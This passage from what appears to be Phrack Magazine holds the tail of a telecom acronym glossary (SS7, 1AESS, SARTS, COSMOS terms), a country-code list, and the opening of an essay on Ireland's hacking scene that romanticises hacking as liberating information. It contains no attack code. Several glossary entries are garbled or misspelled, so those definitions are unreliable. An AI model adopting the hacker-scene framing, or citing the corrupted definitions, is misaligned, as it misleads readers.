dependent data SDDF Subscriber digital distributing frame SDE Submission/delivery entity (x.400) SDIS Switched digital integrated service SDL Specification and description language SDLC Synchronous DLC SDLC Synchronous data link control SDLH Synchronous data link handler SDM Space division multiplex SDN Software defined network SDN Software-defined network SDNBAS Call failed due to the query's being blocked at the switch SDNBN Call failed due to the query's being blocked in the CCS network SDNGTCAP Garbled TCAP message received SDNNCANI CAMA call failed due to CAMA trunk's not providing ANI for query SDNNCFA Call failed while the transaction with the NCP was active SDNNCFI Call failed while the transaction with the NCP was inactive SDNNOCANI CAMA call failed due to CAMA trunk's not providing ANI through ONI for query SDNRER Call failed because to the conversation with the NCP resulted in a return error SDNRER Call failed because to the conversation with the NCP resulting in a return error SDNRR Call failed because to the conversation with the NCP resulted in a reject respon SDNRR Call failed because to the conversation with the NCP resulting in a reject respo SDNTIM Call failed due to the query's not being answered in time by the NCP SDNTRF Call failed due to the NCP's answering with a terminate request SDOC Selective dynamic overload controls SDP Service delivery point SDP Submission and delivery protocol (x.411) SDPT Signal distribution points SDR Store data register SDR Switch data report SDS Switched data service SDS Synchronous data set SDSC Synchronous data set controller SDT Software development tools SE Special access wats-access-std-service code for LATA access SE Special service equipment number SEAS Signaling engineering and administration system SEAS Signalling engineering and administration systems SEC Second SEC Signal level behind the echo canceller (C/I channel code) SEE Systems equipment engineering SEG Segment SEL Digital selector (in TMS) SEL Selecting lines for an exchange class of service study SER# Seral number SES Service evaluation system SES Unk (administrative system) SET Statistics on equipment and telephone numbers SET Strategy execution table SF Service field SF Signal format SF Single frequency. SF Special access- WATS access line improved-service code for LATA SF Status field (SS7) SFB Set next febe to zero SFD Superframe detected (C/I channel code) SFG Simulated facilities SFG Simulated facilities group SFG Simulated facility group SFG Simulated facility group (SFG) measures. SFMC Satellite facility management center SFN Simulated facility number SFV Signal format verification SFV Signaling format verification (SARTS command) SG Control/remote metering signal grade INTER/TRA blocal 1-26 SG Supergroup SG Switch group (SG) (also known as half-grid) SGC Switching group control SGD Failure to receive station group designator (SGD) SGH Select graphic rendition (teletex) SGH Supply relays for groups of 5xb hunts SGL Single SGML Standard generic markup language SGMP Simple gateway management protocol SGN Common language segment number SHI Select horizontal spacing (teletex) SI Sequenced information SI Service indicator SI Shift in (ascii control) SI Status indicator SI Synchronous interface SIC Silicon integrated circuit SICOFI Signal processing codec filter SICOFI2 2 channel sicofi SID System identification SIDB Session information data base SIDES Siemens ISDN software development and evaluation system SIF Signaling information field (SS7) SIG Signaling SIG Signaling equipment (in a trunk) SIGI Sigi SIGS Signaling strobe SILC Selective incoming load control SILC Selective incoming load controls messages. SIM System integrity monitor SIN Status indication normal alignment SIO Service information octet (SS7) SIP Serial interface port SIPB Siemens ISDN pc user board SIPB 5XXX SIPB modules SIPB 7XXX SIPB configurations SIPMOS Siemens PMOS SIPO 6XXX Siemens ISDN pc software object code SIPS 6XXX Siemens ISDN pc software source code SIR Sorting inquiry by range SIS Special identifying telephone number supplement SIT Special identifying telephone number SIT Special information tones SITAC Siemens isolated thyristor AC SITE Site assignments SITEST Siemens ISDN protocol software test tools SIU Subscriber line interface unit SJ Limited switched access line-service code for LATA access SK Skip SK Skip option SL Secretarial line INTER/TRA blocal 1-26 SL Subscriber line SLA Subscriber line adress SLB Subscriber line busy SLC Signaling link code (SS7) SLC Subicer loop carrier SLC Subscriber line counts for custom calling features SLC Subscriber loop carrier SLD Subscriber line data (bus) SLE Screen list editing SLE Screening line editor SLEN SLC line equipment number SLIC Subscriber line interface circuit SLIM Subscriber line interface module SLIM Subscriber loop interface module SLK Signaling link SLM Subscriber line module SLMA SLM analog SLMD SLM digital SLPK SLC-96 pack SLRF Systemiletterntenance results feature (eadas) SLS Signaling link selection (SS7) SLSN Unk COSMOS SLU Special studies SM Same SM Sampling INTER/TRA blocal 1-26 SM Service module SM Speech memory SM Switch module SM Switching modual SM Switching module SM Synchronous multiplexor SMAC Service and maintance administration center SMAS Switched maintance access system SMAS Switched maintance access system (provides access to the RMS-M and RTS) SMASF SMAS frame SMASPU SMAS power unit SMD Surface mounted device SMDF Subscriber main distributing frame SMDI Subscriber message desk interface SMDR Station message detail record SMDR Station message detail recording SMDR Station message detailed recording SMDS Switched multi-megabit data service SMF Sub multi frame SMG Supermastergroup SMM SARTS maintence manager (VAX 1/780) SMP SARTS maintance position (TP 52a) SMPU Switch Module Processor Unit SMS Service management system SMS Station management systems SMS Switching Module System SMSA Standard metropolitan statistical area SMTP Simple mail transfer protocol SMU Subscriber module urban SMU System master unit SN Sequence number SN Special access termination INTER/TRA blocal 1-26 SNA System network architecture (IBM) SNA Systems network architecture SNADS System network architecture distribution service SNET Southern new england telephone SNF Serial number format SNL Signaling link (CCS7) SNLS Signaling link set (CCS7) SNRS Signaling network route set (CCS7) SNS Service network system SO Service order SO Shift out SOAC Service order analysis and control SOB Service observing assignments SOB Service observing tag SOC Service order cancel SOC Service oversight center SOCC Standard optical cable code SOCC Switching operation control center SODC Service order delayed completion SOE Service order establishment SOE Standrard operating environment SOF Service order fix SOH Service order history SOH Service order withheld SOH Start of header SOI Service order assignment inquiry SOI Service order image SOL Service order listing SOM Modify a pending service order SONAR Service order negotiation and retrieval SONDS Small office network data system SONET Synchronous optical network SORD Service order dispach SOW Service order withdrawal SP Signal p SP Signal point (switching office in SS7) SP Signal processing SP Signal processor SP Signaling point SP Stimulus protocol SPA Special access SPACE Service provisioning and creation environment SPAN Space physics analysis network SPAN System performance analyzer SPARED Line involved in ISLU sparing configuration. SPC Signaling poiny code (SS7) SPC Southern pacific communications SPC Stored program control SPC Stored program controlled SPCR Serial port control register SPCS Stored program control system SPCS Stored programacontrolnsystem SPCS COER Stored-program control system/central office equipment report SPCSS Stored program control switching system SPD Speed SPDA Supplier data program SPFC Special purpose function code SPH Session protocol handler SPI Serial peripheral interface SPINT Signal processor interrupt SPL Split SPM Split and monitor SPM Split and monitor (SARTS command) SPOC Single point of contact SPS Split and supervise SPS Split and supervise (SARTS command) SPUC/DL Serial peripheral unit controller/data link SQ Equipment only-customer premises INTER/TRA blocal 1-26 SQA Simulated facility group (SFG) announcement (SAQ) SQD Signal quality detector SQL/DS Structured query language/data system SRA Selective routing arrangement SRAM Static ram SRCF Single line remote call forward SRDC Subrate data cross connect SRDM Subrate data multiplexer SRI Subscriber Remote Interface (RLCM) SRI Subscriber Remote Interface pack SRL Singing return loss SRV Service SRVT SCCP Routing Verification Test SS Dataphone select-a-station INTER/TRA blocal 1-26 SS Signaling system SS Special services SS7 Signaling system #7 (ccitt) SSA Special service automation SSAS Station signaling and announcement subsystem SSB Single-sideband SSB Switched services bureau SSBAM Single-sideband amplitude modulation SSC Specal service center SSC Special service center SSC Special services center SSC Standard speech circuit psb4500/-1 SSCP Subsystem services control point SSD No second start dial wink SSD No second start dial wink (MDII) SSDAC Specal services dispach administration centers SSF Sub service field SSI Serial signal interface SSN Subsystem number SSN Switched service network SSO Satellite switching office SSO Satellite switching office assignments SSP Send single pulses (C/I channel code for test mode) SSP Service switching point SSP Service switching points SSP Signal switching point SSP Sponsor selective pricing SSP Switching service points SSP System status panel SSPC Ssp controller SSPRU Ssp relay unit SSTR Selective service trunk reservation (SSTR). SSTR Service selective trunk reservation SSTTSS Space-space-time-time-space-space network SSWAP Switching services work allocation precedures (GTE) ST A signal that indicates the end of mf pulses (stop) ST Present status of telephone number ST Self test request nt (IOM2 monitor message) ST Start ST Subscriber terminal STA Station sset STAB Station abbreviation file STARS Sampled traffic analysis and repo ts systems STATMUX Statistical multiplexer STB Standby STC Service test center STC Serving test center STC Switching technical center STCR Syncron transfer control register STD Standard STD Subscriber trunk dialing STDM Statistical time division multiplexing STEP Services testing evolution platfoem STEP Sides static test of IOS and mf on board (in sitest) STKE Stack protect error STLWS Supplementary trunk and line work station STM Synchronous transfer mode STN Station definition STN Summarize telephone numbers STOR Memory storage STORY Screening tool for report files (IOS) STP Self test pass (IOM2 monitor message) STP Signal transfer point STP Signal transfer point (SS7) STP Stop STRAT Strategy STS Shared tenant service STS Space-time-space network STS Space-time-space switch (TMS-TSI-TMS) STS Station signaling STS Station signaling test (SARTS command) STS Steered tenant service STS Synchronous transport signal STS 2060 Sicofi software STT Telephone number status STTP Supplementalstrunkntest panel STTP Supplementary trunk test panel - trunk testing position (1ess) STU 2000 Stand alone ISDN user board STU 2040 Stand alone MTS user board STU 2050 Stand alone PBC user board STU 2060 Stand alone SICOF user board STUDIALO PC software for STU 2xxx STX Start of test STX Start of text SU Signaling unit SU Syndes units (syncronizers-dessyncronizers) SU5IN Subunit 5 interrupt SU6IN Subunit 6 interrupt SU7IN Subunit 7 interrupt SUB Sub switch SUB Sub-addressing (i.251) SUB Substitute character (teletex) SUBL Sublet service SUERM Su error rate monitor SUFX Sufix SUM1 Summary screen SUP Supervision SUS Suspend (SS7: in ISUP) SUSP Suspend (i.451) SV Slave SV Switched voice SVB Serving bureau SVC Critical service circuits SVC Switched virtual circuit SVC Switched virtual circuits SVL Service observing loops SVP Surge voltage protector various SVS Select vertical spacing (teletex) SVS Switched voice service SW Switch name SW Switched SWB Southwestern bell SWC Same wire center SWC Set work code SWEQF Switch equipment failure. SWFC Sliding-window flow control SWFN Switch function file SWG Sub working group SWS Switch work station SWS Switched signaling SWS Switching signal test (SARTS command) SWST Switch signature table SX Simplex (mode is a PT TR connected togeather) SX Simplex signaling SXS Step by (X) step SYC System control SYN Synchronous idle SYNDES Synchonizer/dessynchonizer SYP Synchronisation pulse SYS Machine number SYS System SYS System manager SYSGEN System generation SZD Seized SxS Step-by-step or strowger switch T Double wire pair T Intials of person receiving report. T Terminaltion T Tip T&A Toll and assistance T&L Termination T&M Talk-and-monitor T&R Tip and ring T&R Two wire phone connection T- Transportfunction- T-BERD T-carrier Bit Error Rate Tester T-GRND Tip-ground T1/OS T1 carrier outstate T1FE T1 carrier front end TA Tandem tie-trunk INTER/TRA blocal 1-26 TA Terminal adaption TA Terminal adaptor TA Transfer allowed TA Transfer assembly TAB Telephone ability battery TAC Technical assistance center TAC Tei assignment control (IOS) TAC Terminal access circuit TAC Test and access circuit TACD Telephone area code directory TAD Test access digroup TAG Translation administration group TAI Tie pair assignment inquiry TAN Technation access network TAN Test access network TAP Telephone assistance plan TAP Teletex access protocol (x.430: p5) TAP Test access path TAP Touchtone assignment priority number TARE Tariff table (AMA NTI) TAS Telephone answering service TASC Technical assistance service center TASC Telecommunications alarm and surveillance control TASC Telecommunications alarm surveillance and control system TASI Time assignment speech interpolartion TASI Time assignment speech interpolation system TAT Test access trunk TAT Test alignment of frame terminal TAT Transatlantic telephone TATS Trouble analysis of transmission and signaling TAU Time assignment unit TBL Trouble TC Control/remote metering-telegraph grade INTER/TRA blocal 1-26 TC Timing counter TC To cable TC Toll center TC Transaction capabilities TC15 Reports overall traffic condition - 1AESS traffic condition TCA Telephone company administration TCAP Telecommunications alarm surveillance TCAP Transaction (ie sdngtcap) TCAP Transaction capabilities application part TCAP Transaction capabilities applications port TCAS T-carrier administration system TCAS T-carrier administration system) TCAS T-carrier administrative system TCC Toll control center TCC Trunk class code TCG Test call generation TCIF Telecommunications industry forum TCM Time compression multiplexer TCM Trellis coded modulation TCP Transport control protocol (DOD) TCR Transient call record TCS Terminating code screening TCSP Tandem cross section program TCU Timing control unit TD Test direction TD Tone decoders TDAS Traffic data administration system TDAS Translation data assemblern system TDC Tape data controller TDC Telex destination code (ISO 7498) TDC Terrestrial data circuit TDD Telecommunications device for deaf TDF Trunk distributing frame TDM Time division multiplex TDMA Tdm access TDRS Traffic datatrecorderasystem TE Terminal equipment TE Transit exchange (contains PSF) TE Transverse electric TED Text editor TEHO Tail end hop off TEI Terminal endpoint identifier TELEX Teleprinter exchange TELNET Virtual terminal protocol TELSAM Telephone service attitude measurement TEN Trunk equipment number TER Terminal TERM Terminate TERM Terminating TEST In test mode. TET Display or change band filter file TF Telephoto/facsimile INTER/TRA blocal 1-26 TFC Transfer frame changes TFLAP T-carrier fault-locating application program TFS Trunk forecasting system TFTP Television facility test position TG Tip-to-ground TG Translation guide TGC Manual trunk group controls messages. TGC Terminal group controller TGID Trunk group id TGMEAS Basic trunk group measurements TGN Trunk group number TH Trouble history THGP Thousands groups THL Trans hybrid loss TI Test indication TIA Telephone information access TIC Telecom ic (IOM-bus) TICOM Treated interface common circuit. TIDE Traffic information distributor & editor TIG Dial transfer input generator TIM Timing TIMEREL Time release TINTF The T interface is down. TIP The installation practices TIRKS Trunk integrated record keeping system TK Local PBX trunk INTER/TRA blocal 1-26 TK Trunk cable and pair number TKT Trouble ticket file TL Non-tandem tie trunk INTER/TRA blocal 1-26 TL Test line TL02 Reason test position test was denied - 1AESS traffic TLC Tail COSMOS TLC Translate lanavar/CPS TLI Telephone line identifier TLK Talk TLM Trouble locating manual TLN Trunk line network TLP Transmission level point TLPU Telecommunications line processor unit TLS Tail switch TLTP Trunk line and test panel TLTP Trunk line testrpanelng frame TLWS Trunk and line work station TM Testmode TM Transverse magnetic TM Trasfer modus TM Trunk mantance TM1 Terminal 1 (IOS) TMA Trunk module analog TMAS Transport maintance and administration systems TMC Timeslot management channel TMD Trunk module digital TMDF Trunk main distributing frame TME Trunk module equipment TMMS Telephone message management system TMPS Trunk maintenanceaposition TMR Transient memory record TMRS Traffic MeasuRment (GTE) TMRS Traffic measurement and recording system TMRS Traffic metering remote system TMS Time mutiplexed switch TMS Time-multiplexed switch TMS Time-multiplexed switching TMT Traffic management. TMX Trunk module with x-interface TN Telephone number TN Tone (C/I channel code: wake up signal) TN Transaction number TN01 Trunk diagnostic found trouble - 1AESS trunk network TN02 Dial tone delay alarm failure - 1AESS trunk network TN04 Trunk diag request from test panel - 1AESS trunk network TN05 Trunk test procedural report or denials - 1AESS trunk network TN06 Trunk state change - 1AESS trunk network TN07 Response to a trunk type and status request - 1AESS trunk network TN08 Failed incoming or outgoing call - 1AESS trunk network TN09 Network relay failures - 1AESS trunk network TN10 Response to trk-list input usually a request from test position TN11 Hourly status of trunk undergoing tests - 1AESS trunk network TN16 Daily summary of precut trunk groups - 1AESS trunk network TNC Terminal node controller TNDS Total network data system TNF Telephone number format TNN Trunk network number TNOP Total network operation plan TNOP Total network operations plan TNPC Traffic network planning center TNS Telephone number swap TO Toll office TOC Television operating center TOC Transfer order completion TOC0 Reports status of less serious overload conditions - 1AESS traffic TOC0 Serious traffic condition - 1AESS traffic overload TOE Transfer order establishment TOF Mass oe transfer order frame listings TOI Dial transfer order inquiry TOL Transfer order lists TOO Transfer order omissions TOP Task-oriented practices TOP Technical office protocol TOPQ Top of queue (Quasi SDL) TOPS Timesharing operating system TOPS Traffic operator position system TOS Trunk orderf-service (list) TOSS/MP Traffic operator sequence simulator/mult purpose TOW Transfer order withdrawal TP Dacs test port or test position TP Test position TP Tie pair TP Toll point TP 52A SARTS test position 52A TPC TOPS (DMS) position controllers TPH Transport protocol handler TPMP Tnds performance measurement plan TPMP Total network data system performance measurement plan TPR Taper code TPU Tie pair usage report TQ Television grade customized-service code for LATA access TQ Trunk query TQA Trunk group queuing announcements TR Test register TR Toll regions TR Transfer register TR Trunk reservation controls messages. TR Turret or automatic call distributor (ACD) trunk INTER/TRA blocal TR01 Translation information - 1AESS TRAC Call tracing TRANS Transmit TRB Periodic trouble status reporting TRBL Unspecified trouble. TRBLORG Origination trouble. TRC Transfer order recent change report TRCC T-carrier restoration and control centers TRCO Trouble reporting control office TRE Transmission equipment TREAT Trouble report evaluation analysis tool TREAT Trouble reporteandsanalysisstool TREQF Transmission equipment failure. TRFC15 Fifteen minute traffic report TRG Trouble reference guide TRI Tone ringer psb652x TRI Transmission equipment assignment inquiry TRK Analog or digital recorded announcement trunks TRK Trunks TRKBD Trunk board. TRKCT Trunk circuit. TRM Two mile optically remote switching module TRM Two-mile remote switching module TRMG Terminal group TRMSN Transmission TRMTR Tramsmitter TRMTR Transmitter TRNS Translations TRR Tip-ring reversal TRR Tip-ring reversal (MDII) TRR Tip-ring reverse TRU Transmit/receive unit TRVR Translation verification TRW Total reservation order withdrawal TS Test number TS Time slot TSA Time slot assignment TSC Test system controller TSC Tristate control TSC/RTU Test systems controller/remote test unit TSCPF Time switch and call processor frame TSCPF Time switch and central processor frame TSG Timing signal generator TSI Time slot interchanger TSI Time slot interchangers TSI Time-slot interchange TSIIN Time-slot interchange interrupt TSIU Time slot interchange Unit TSL Line equipment summary report TSMS Traffic seperation measurment system TSN Test session number TSN Traffic statistics on telephone numbers TSO Time sharing option TSORT Transmission system optimum relief tool TSP Test supervisor TSP Traffic service position TSPS Traffic service position system TSS Trunk servicing system TSS Trunk servicing systems TSST Time-space-space-time network TST Test TST Time-space-time network TST Time-space-time switch (TSI-TMS-TSI) TST Transmission test TST Traveling-wave tube TSTS Time-space-time-space network TSV Test ststus verification (monitor) TSW Total service order withdrawal TT Teletypewriter channel INTER/TRA blocal 1-26 TT Trunk type TTA Terminating traffic area TTAA Transmission theory and applacations TTC Terminating toll center TTE Trunk trafic engineering TTFCOM Test transmission facility common TTFCOM Transmission test facility common TTL Transistor-transistor logic TTMI Trunkytransmission maintenance index TTP Trunk test panel TTR Operator trunk trouble reports TTR Operator trunk trouble reports (MDII) TTS Trunk time switch TTSI Transmit time slot interchanger TTTN Tandem tie trunk network TTU Trasnslation Table Update (GTE) TTY Get tty name - COSMOS command TTY Teletypewriter TTYC Tty controller TU Transmit unit TU Trunk unit TU Turret or automatic call distributor (acd) line INTER/TRA blocal TUCHBD Trunk unit channel board TUP Telephone user part (SS7: q.72x) TUR Traffic usage recording TUR Trunk utilization report TUT Trunk under test TV TV channel one way 15khz audio-service code for LATA access TW TV channel one way 5khz audio-service code for LATA access TW Twist TW02 Dump of octal contents of memory - 1AESS translation TWX Teletype writer exchange TWX Teletypewriter exchange TX Dedicated facility INTER/TRA blocal 1-26 TX Tone transceivers TXC Text checker TXM Transfer centrex management TYP Switch type TYP Type Talkoff Take off Trunk Trunk TxSD Transmit serial data U Single wire pair U(k0) (ger) u0 echo cancellation interface U(p0) (ger) u0 burst mode interface U- Unnumbered (u-frames) U-DSL U-interface digital subscriber line UA Unnumbered ack (LAP-D response) UA User agent (x.400) UAE User application entity or user agent entity (x.400) UAF Unblocking acknowledgment failure UAI U activation indication (C/I channel code) UBA Unblocking acknowledgement UBL Unblocling (SS7: in ISUP) UCA Unauthorized centralized automatic message accountin (MDII) UCD Uniform call distribution UCL Unconditional UCONF Universal conference UCS User control string UDC Universal digital channel UDLC Universal dlc UDP Update dip parameters UDP User datagram protocol UDR User data rate UDT Unidata (SS7: in SCCP) UDTS Unidata servive (SS7: in SCCP) UDVM Universal data voice multiplexer UES Update the entity summary table UFD Microfarad UFO Unprinted frame orders UFT Unitized facility terminals UI Unnumbered information (LAP-D command) UIC U-interface unit UIC User identification code UID User id UINTF The ANSI standard U interface is down. UITP Universal information transport plan ULCU User level control/command unit UMC Unassigned multiplexer code UNDRN Underrange UNISTAR Universal single call telecommunications answering & repair UNKN Unknown UOA U interface only activation (in EOC) UP User part UPC Update ccs vs. class of service table UPDT Update UPS Uninterruptable power systems UQL Unequipped label received (outgoing) US USOC US Unit separator USART Universal synchrounous/asynchrounous receiver/transmitter USB Upper side band USITA United states independent telephone association USL List USOC (us) file data USO Univeral service order USO Universal service order USOC Universal service order code USP Universal sampling plan USR User-to-user information (SS7: in ISUP) UTC Unable to comply ack (in eoc) UTC Unacknowledged (unnumbered) information transfer control (IOS) UTC Update table for concentrator redesign UTD Universal tone decoder UTG Universal tone generator UTM Universal transaction monitor UTS Umbilical time slot UUCICO Unix to unix copy incoming copy outgoing UUCP Unix to unix copy program UUCP Unix-system to unix-system copy UUID Universal user identification UUS User-to-user signaling (i.257 a) UUT User to user signaling UVC Universal voice channel UWAL Universal wats (wide area telephone service) access line UXS Unexpected stop UXS Unexpected stop (MDII) V Volts V(R) Receive sequence counter V(S) Transmit sequence counter VAC Vacuumschmelze (produces cores and transformers) VAL Minimum valid hours for entity data VAN Value added network VANS Value added network service VAP Value added process VAP Videotext access point VAR Value added retailer VC Virtual call VC Virtual circuit VCA Vacant code VCB Virtual circuit bearer VCS Virtual circuit switch (as in Datakit) VCS Virtual circuit switching VCS Virtual circuit system VDC Unk? (On service order) VDT Video display terminal VERS Version VF Commercial television (full time) INTER/TRA blocal 1-26 VF Voice frequency VFAC Verified and forced account codes VFD Verify display VFG Virtual facility group VFN Vendor feature node VFS Verify status VFY Verfy VFY Verify VG Voice grade VGB Voice grade budget VGF Voice grade facility VGT Boltage test VGT Voltage test (SARTS command) VH Commercial television (part time) INTER/TRA blocal 1-26 VHDL Very high scale ic description language (DOD) VHF Very high frequency VINES Virtual network software VIU Voiceband interface unit VL (Ger) connecting cable VLD Validity VLSI Very large-scale integrated circuitry VLT Voltage VM Control/remote metering-voice grade INTER/TRA blocal 1-26 VM/SP Virtual machine/system product VMC Vender marketing center VMCF Virtual machine communications facility VMR Volt-meter reverse VMRS Voice message relay system VMS Virtual memory operating system VMS Voice mail system VMS Voice management system VMS Voltage Monitor error Summary VNF Virtual network feature VNL Via net loss plan VNLF Via net loss factor VO International overseas television INTER/TRA blocal 1-26 VODAS Voice over data access station VPA Voice path assurance timeout (outgoing) VPN Virtual private network VR Non-commercial television VRMS Voltage remote mean square VRS Voice response system VSAM Virtual storage access method VSAT Very small aperature terminal VSAT Very small aperture terminal (for satellite communication) VSB Vestigial sideband modulation VSC Vendor service center VSE Virtual storage extended VSP (ger) full frame storage VSR Voice storage and retrieval VSRTP Voice service remote test port VSS Voice storage system VSSP Voice switch signaling point VSt (ger) exchange unit VT Vertical tabulator VT Virtual terminal VTAM Virtual telecom access method VTAM Virtual telecommunications access method VTI Virtual terminal interface VTOC Volume table of contents VTS Video teleconferencing system VUA Virtual user agent W Date and time this ticket is closed. W With WADS Wide area data service WAN Wide area network WATS Wide area telecommunications service WATS Wide area telephone service WB Wideband digital 19.2 kb/s-service code for LATA access WC Special 800 surface trunk INTER/TRA blocal 1-26 WC Wire center WCC Change wire center - COSMOS command WCI Write controller interface (IOM2 monitor command) WCPC Wire center planning center WCT Worksheet for cable throw orders WD Special wats trunk (out) INTER/TRA blocal 1-26 WDCS Wideband digital cross-connect system WDFHP Recursive high pass filter + decimation filter WDFLP Recursive low pass filter + decimation filter WDM Wavelength division multiplex WDM Wavelength division multiplexing WDT Watch dog timer WE Wideband digital 50 kb/s-service code for LATA access WEBS Wells electronic banking system WF Wideband digital 230.4 kb/s-service code for LATA access WFA Work and force administration WFA-CMSA Work and force administration - common module for systems administration WFA/DO Work and force administration/dispatch out WFL Working frame location WG Switch group WH Wideband digital 56 kb/s-service code for LATA access WI 800 surface trunk INTER/TRA blocal 1-26 WI Wink start WIP Workcenter information package WJ Wideband analog 60-108 khz-service code for LATA access WL Wideband analog 312-552 khz-service code for LATA access WM Work manager WN Wideband analog 10hz-20 khz-service code for LATA access WO Wats line (out) INTER/TRA blocal 1-26 WOI Work order inquiry WOL Work order listing WORD Work order and record detail WORD Work order record and details WP Wideband analog 29-44 khz-service code for LATA access WPN Work package number WPT Work package table WPT Work package type WR Wideband analog 564-3064 khz-service code for LATA access WS Wats trunk (out) INTER/TRA blocal 1-26 WSL Work status list WSO Wats service office WUL Work unit report for subscriber line WX 800 service line INTER/TRA blocal 1-26 WY Wats trunk (2-way) INTER/TRA blocal 1-26 WZ Wats line (2-way) INTER/TRA blocal 1-26 X Check t for trouble X-bar Crossbar XA Dedicated digital 2.4 kb/s-service code for LATA access XAD Transmit adress XB Dedicated digital 4.8 kb/s-service code for LATA access XB X-bar XBT X-bar tandem XFE X-front end XFIFO Transmit fifo XG Dedicated digital 9.6 kb/s-service code for LATA access XH Dedecated digital 56. kb/s-service code for LATA access XID Exchange identification (LAP-D command/response) XMS Extended multiprocessor operating system XN X XN X number XOFF Transmission off (dc1) XON Transmission on (dc3) XPL Cross reference protocol listing (PCT) XST Expected stop time-out XTC Extended test controller XTC Extended test controllers XTC Extened test controller Y Initials of person to whom ticket is dispatched Z Redispatch information. Z Transmit level point z ZA Alarm circuts INTER/TRA blocal 1-26 ZC Call and talk circuts INTER/TRA blocal 1-26 ZCS Zero code suppression ZCS Zero code suppression encoding (ds-1) ZE Emergency patching circuts INTER/TRA blocal 1-26 ZF Order circuts- facility INTER/TRA blocal 1-26 ZM Measurement and recording circuts INTER/TRA blocal 1-26 ZN Zone location ZP Test circut- plant service center INTER/TRA blocal 1-26 ZQ Quality and management circuts INTER/TRA blocal 1-26 ZS Switching- control and transfer circuts INTER/TRA blocal 1-26 ZT Test circuts- central office INTER/TRA blocal 1-26 ZV Order circuts- service INTER/TRA blocal 1-26 kHz Kilohertz-one thoughand hertz ----------------------EOF------EOF-------EOF------EOF---------------------- ==Phrack Magazine== Volume Four, Issue Forty-Three, File 26 of 27 International Scenes There was once a time when hackers were basically isolated. It was almost unheard of to run into hackers from countries other than the United States. Then in the mid 1980's thanks largely to the existence of chat systems accessible through X.25 networks like Altger, tchh and QSD, hackers world-wide began to run into each other. They began to talk, trade information, and learn from each other. Separate and diverse subcultures began to merge into one collective scene and has brought us the hacking subculture we know today. A subculture that knows no borders, one whose denizens share the common goal of liberating information from its corporate shackles. With the incredible proliferation of the Internet around the globe, this group is growing by leaps and bounds. With this in mind, we want to help further unite the communities in various countries by shedding light onto the hacking scenes that exist there. We have been requesting files from people to describe the hacking scene in their country, but unfortunately, more people volunteered than followed through (you know who you are.) By next issue we will have more, I'm sure, but for now, we want to introduce you all to the scenes in Ireland and Canada. ***************************************************************************** COUNTRIES ON THE INTERNET AD Andorra AE United Arab Emirates AF Afghanistan AG Antigua and Barbuda AI Anguilla AL Albania AM Armenia AN Netherland Antilles AO Angola AQ Antarctica AR Argentina AS American Samoa AT Austria AU Australia AW Aruba AZ Azerbaidjan BA Bosnia-Herzegovina BB Barbados BD Bangladesh BE Belgium BF Burkina Faso BG Bulgaria BH Bahrain BI Burundi BJ Benin BM Bermuda BN Brunei Darussalam BO Bolivia BR Brazil BS Bahamas BT Buthan BV Bouvet Island BW Botswana BY Bielorussia BZ Belize CA Canada CC Cocos Island CF Central African Republic CG Congo CH Switzerland CI Ivory Coast CK Cook Islands CL Chile CM Cameroon CN China CO Colombia CR Costa Rica CS Czechoslovakia CU Cuba CV Cape Verde CX Christmas Island CY Cyprus DE Germany DJ Djibouti DK Denmark DM Dominica DO Dominican Republic DZ Algeria EC Ecuador EE Estonia EG Egypt EH Western Sahara ES Spain ET Ethiopia FI Finland FJ Fiji FK Falkland Islands FM Micronesia FO Faroe Islands FR France FX France GA Gabon GB Great Britain (UK) GD Grenada GE Georgia GH Ghana GI Gibraltar GL Greenland GP Guadeloupe GQ Equatorial Guinea GF French Guyana GM Gambia GN Guinea GR Greece GT Guatemala GU Guam GW Guinea Bissau GY Guyana HK Hong Kong HM Heard & McDonald Island HN Honduras HR Croatia HT Haiti HU Hungary ID Indonesia IE Ireland IL Israel IN India IO British Indian Ocean Territories IQ Iraq IR Iran IS Iceland IT Italy JM Jamaica JO Jordan JP Japan KE Kenya KG Kirgistan KH Cambodia KI Kiribati KM Comoros KN St.Kitts Nevis Anguilla KP North Korea KR South Korea KW Kuwait KY Cayman Islands KZ Kazachstan LA Laos LB Lebanon LC Saint Lucia LI Liechtenstein LK Sri Lanka LR Liberia LS Lesotho LT Lithuania LU Luxembourg LV Latvia LY Libya MA Morocco MC Monaco MD Moldavia MG Madagascar MH Marshall Islands ML Mali MM Myanmar MN Mongolia MO Macau MP Northern Mariana Island MQ Martinique MR Mauritania MS Montserrat MT Malta MU Mauritius MV Maldives MW Malawi MX Mexico MY Malaysia MZ Mozambique NA Namibia NC New Caledonia NE Niger NF Norfolk Island NG Nigeria NI Nicaragua NL Netherlands NO Norway NP Nepal NR Nauru NT Neutral Zone NU Niue NZ New Zealand OM Oman PA Panama PE Peru PF Polynesia PG Papua New Guinea PH Philippines PK Pakistan PL Poland PM St. Pierre & Miquelon PN Pitcairn PT Portugal PR Puerto Rico PW Palau PY Paraguay QA Qatar RE Reunion RO Romania RU Russian Federation RW Rwanda SA Saudi Arabia SB Solomon Islands SC Seychelles SD Sudan SE Sweden SG Singapore SH St. Helena SI Slovenia SJ Svalbard & Jan Mayen Islands SL Sierra Leone SM San Marino SN Senegal SO Somalia SR Suriname ST St. Tome and Principe SU Soviet Union SV El Salvador SY Syria SZ Swaziland TC Turks & Caicos Islands TD Chad TF French Southern Territories TG Togo TH Thailand TJ Tadjikistan TK Tokelau TM Turkmenistan TN Tunisia TO Tonga TP East Timor TR Turkey TT Trinidad & Tobago TV Tuvalu TW Taiwan TZ Tanzania UA Ukraine UG Uganda UK United Kingdom UM US Minor Outlying Islands US United States UY Uruguay UZ Uzbekistan VA Vatican City State VC St.Vincent & Grenadines VE Venezuela VG British Virgin Islands VI U.S. Virgin Islands VN Vietnam VU Vanuatu WF Wallis & Futuna Islands WS Samoa YE Yemen YU Yugoslavia ZA South Africa ZM Zambia ZR Zaire ZW Zimbabwe **************************************************************************** HACKING IN IRELAND BY HAWKWIND Greetings from the Emerald Isle! My name is Hawkwind, and I'm an Irish hacker *evil cackle*. So, what's the hacking scene like in this small green island called Ireland, perched on the edge of the Atlantic Ocean? -an island which claims to have one of the most sophisticated digital phone networks in Europe, home of Eirpac (the Irish equivalent to Sprintnet/Telenet) and lots of other weird and wonderful things like that. Well, the hacking scene, like the country itself, is small -there are no elite in Ireland. -or if there are they are so elite that nobody has heard of them. So if you're only into elite stuff, then don't bother reading on, skip onto the next country. Also, sadly at the moment, there seems to be little interest in hacking in Ireland -I can count the number of Irish hackers I know on the fingers of one hand. Maybe I'm just hanging out in the wrong places, or perhaps its the Iron Hand of Ireland's own Little Brother, friend and follower of the U.S's Big Brother, enforcing his evil ways of censorship and the like upon us all, denying us the right to free information. Nationwide censorship of 